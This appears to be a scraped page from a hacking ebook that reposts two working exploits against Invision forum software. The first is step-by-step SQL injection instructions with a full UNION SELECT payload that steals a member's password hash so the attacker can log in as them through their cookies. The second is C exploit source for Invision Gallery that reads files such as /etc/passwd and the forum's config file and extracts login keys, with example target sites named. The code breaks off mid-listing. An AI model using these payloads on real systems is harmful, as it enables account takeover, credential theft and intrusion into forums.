
Hacker Professional Ebook part 379 ppt




Black_hat_cr(HCE) Invision Community Blog Mod 1.2.4 SQL Injection Vulnerability Code: 1. Open any blog entry 2. Try to reply to any message 3. Push "Preview message" button (Do not post your reply) 4. Save source code of opened page to your PC 5. Find this string <input type='hidden' name='eid' value='<BLOG_ENTRY_ID>' /> 6. Change <BLOG_ENTRY_ID> with this SQL Injection: <BLOG_ENTRY_ID> UNION SELECT b.entry_id, b.blog_id, b.category_id, b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key, b.entry_category, b.entry, b.entry_status, b.entry_locked, b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, b.entry_last_comment_name, b.entry_last_comment_mid, b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM ibf_members, ipb_blog_entries b WHERE id=<USER_ID> and b.entry_id=<BLOG_ENTRY_ID> LIMIT 1,1 <USER_ID> - ID of the user whom password you want to get. 7. Push "Preview Button" again. 8. After refresh instead of blog entry name you will get users's HASH password. 9. Change your cookies in your favorite browser and open board. You will be automaticaly logged in as the user whom password you just got. 
Black_hat_cr(HCE) Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux) Code: /* _ _ _ _ _ __ _ _ _ | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ hellknights.void.ru |___/ (c)oded by _1nf3ct0r_ (Windows), ported by ShadOS(Linux) Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit + + | Uzage: | + + [+] ReadFile(): - syntax: readfile 1 <host> <pathtoindex> <localfile> readfile 2 <host> <pathtoindex> <localfile> // try it if readfile[1] failed ;) - params: <localfile> - path to local file ( /file), for example: / / / / /etc/passwd s0, if u want to get local path to IPB try this: / /hellknightscrewxploit :) - examples: readfile 1 asd.ru index.php / / / / / /etc/passwd readfile 1 asd.ru forum/index.php / /conf_global.php readfile 1 asd.ru forum/index.php / /conf_global.php%00 [+] SQL-injection: - syntax sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table> getprefix <host> <pathtoindex> // get database prefix from IPB error :) - params: <member_id> - member's id for SQL-injection result, for example: 1 <column> - ipb members' column to get. for example: ip_adress, email. <table> - ipb table to use. for example: member <prefix> - database prefix. 
- examples: ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1 ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5 [~] sorry, but i`m too lazy 2 optimize this c0de [~] Music: Orbital - Halcyon and On and On (OST Hackers) :) [~] compiled with LCC(Windows), gcc 4.1.1(Linux) without any warnings Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team itz public c0de n0w, have phun :> ./ig sqlinject linuxforum.ru index.php member_login_key ibf_ members 1 ./ig readfile 2 .ru index.php / / / / / / / / /etc/passwd ./ig sqlinject forum.pesni.ru index.php member_login_key ibf_ members 1 */ #include <stdlib.h> #include <stdarg.h> #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <resolv.h> #include <errno.h> #include <netdb.h> #define MAXBUF 1024 int Exploit(char * sendbuffer, char * mode, char * host) { char recvbuffer[10024]; memset(recvbuffer,0,10024); char * temp; struct hostent *hostname; int s; if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) return -1; struct sockaddr_in webaddr; bzero(&webaddr, sizeof(webaddr)); webaddr.sin_family = AF_INET; webaddr.sin_port = htons(80); hostname = gethostbyname(host); if (hostname) { memcpy(&webaddr.sin_addr, hostname->h_addr, hostname->h_length); } else { return 1; } if (connect(s, (struct sockaddr *)&webaddr,sizeof(webaddr))) return -1; send(s, sendbuffer, strlen(sendbuffer),0); int i, j; while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) for(i = 0; recvbuffer[i]!=0; ++i) { if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&& (recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n')) {temp = (char*)&recvbuffer[i] + 4;break;} } if(strcmp(mode,"readfile")==0) { printf("\n [+] Exploit Result:\n\n%s", temp); return 0; } if(strcmp(mode,"sqlinject")==0) { char * token = NULL; char * injected = NULL; char * parse = NULL; token = strtok(temp, "="); token = 
strtok(NULL, "="); token = strtok(NULL, "&"); token = strtok(NULL, "&"); for(j = 0; j < 2; j++) { token = strtok(NULL, "&"); if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); } } } else { printf("\n[-] some error. change MODE param\n"); return 0; } close(s); return 0; } int main(int argc,char * argv[]) { printf("\n \n"); printf(" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \n"); printf(" (c)oded by _1nf3ct0r_ // Hell Knights Crew \n"); printf(" ported by ShadOS(Linux) // Hell Knights Crew \n"); printf(" http://hellknights.void.ru/ \n"); printf(" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS- Team \n"); printf(" \n"); if (argc == 1) { printf("\n\n [+] ReadFile():\n"); printf(" - syntax:\n"); printf(" readfile 1 <host> <pathtoindex> <localfile> \n"); printf(" readfile 2 <host> <pathtoindex> <localfile> try it 1f readfile[1] failed \n"); printf(" - params: \n"); printf(" <localfile> - path to local file ( /file), f0r example: / / / / /etc/passwd\n"); printf(" s0, 1f u want to get local path to IPB 7ry th1s: / /hellknightscrewxploit \n"); printf(" - examples:\n"); printf(" readfile 1 asd.ru index.php / / / / / /etc/passwd\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php%00\n\n\n"); printf(" [+] SQL-injection:\n"); printf(" - syntax\n"); printf(" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n"); printf(" getprefix <host> <pathtoindex> get database prefix from IPB error \n"); printf(" - params:\n"); printf(" <member_id> - member's id for SQL-injection result, for example: 1\n"); . [~] sorry, but i`m too lazy 2 optimize this c0de [~] Music: Orbital - Halcyon and On and On (OST Hackers) :) [~] compiled with LCC(Windows), gcc 4.1.1(Linux) without any warnings Gr33tz: blackybr,
